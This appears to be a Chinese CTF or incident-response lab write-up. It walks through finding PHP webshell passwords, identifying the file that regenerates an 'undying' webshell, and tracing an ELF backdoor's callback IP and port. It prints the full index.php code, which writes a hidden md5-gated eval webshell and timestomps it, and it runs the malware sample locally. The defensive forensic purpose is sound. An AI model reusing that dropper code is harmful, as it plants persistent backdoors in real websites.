寻找木马密码

首先切换到网站目录/var/www/html，在这里其实直接就可以看到木马，名称为1.php

还可以使用grep和find指令对敏感函数进行匹配，这里的密码就是POST函数中的值，即为 1，故最终 Flag 为 1

find ./ -name "*.php" | xargs grep "eval("

寻找不死马密码

这里依然是使用grep和find指令对敏感函数进行匹配，shell.php这里使用了 MD5 对木马进行加密，提取出的 MD5 为5d41402abc4b2a76b9719d911017c592

解密 MD5 为hello

寻找不死马文件

依然是根据上面的扫描结果进行分析，Flag 3 的目标是找到生成不死马的文件，这里的index.php中包含一个$code函数，生成了不死马

index.php完整代码如下，分析完整代码我们便可以确定生成的不死马为shell.php，故 Flag 为index.php

<?php
include('config.php');
include(SYS_ROOT.INC.'common.php');
$path=$_SERVER['PATH_INFO'].($_SERVER['QUERY_STRING']?'?'.str_replace('?','',$_SERVER['QUERY_STRING']):'');
if(substr($path, 0,1)=='/'){
 $path=substr($path,1);
}
$path = Base::safeword($path);
$ctrl=isset($_GET['action'])?$_GET['action']:'run';
if(isset($_GET['createprocess']))
{
 Index::createhtml(isset($_GET['id'])?$_GET['id']:0,$_GET['cat'],$_GET['single']);
}else{
 Index::run($path);
}
$file = '/var/www/html/.shell.php';
$code = '<?php if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}?>';
file_put_contents($file, $code);
system('touch -m -d "2021-01-01 00:00:01" .shell.php');
usleep(3000);
?>

找出木马 IP

本题需要我们找到黑客留下的木马文件的服务器 IP，这里木马比较好判断，在 Linux 下，一般木马后缀都为elf，依然是在/var/www/html路径下，有一个'shell(1).elf'文件

首先我们使用 Xftp 回传样本到本机（双击样本即可）

这里样本分析其实可以直接放入在线沙箱进行分析，这里使用微步云沙箱进行演示，在【动态分析 > 网络行为】一项中，我们可以看到其对10.11.55.21产生了外联行为，故此 IP 就是服务器 IP，最终 Flag 为 10.11.55.21

寻找恶意 IP 的开启端口

这里的手法上一题的 Flag 也同样适用，本题的处理思路为运行样本后对其网络行为进行监控，首先我们对样本进行提权，使所有用户都能无限制的访问此样本

chmod 777 'shell(1).elf'

之后运行此样本，让其产生外联行为（这里执行后终端会卡住，下一步需要另外开一个终端）

./'shell(1).elf'

之后查看其网络行为，可以看到外联的 IP 和端口

netstat -antlp|more

-a：显示所有的连接和监听端口。包括 TCP 和 UDP 的监听以及非监听状态的套接字
-n：以数字格式显示地址和端口号，而不是尝试解析主机名或端口名。这会加快输出速度
-t：仅显示 TCP 连接
-l：仅显示正在监听的套接字(即处于 LISTEN 状态的端口)
-p：显示使用这些连接的进程 ID 和进程名称。需要超级用户权限(root)才能看到其他用户的进程信息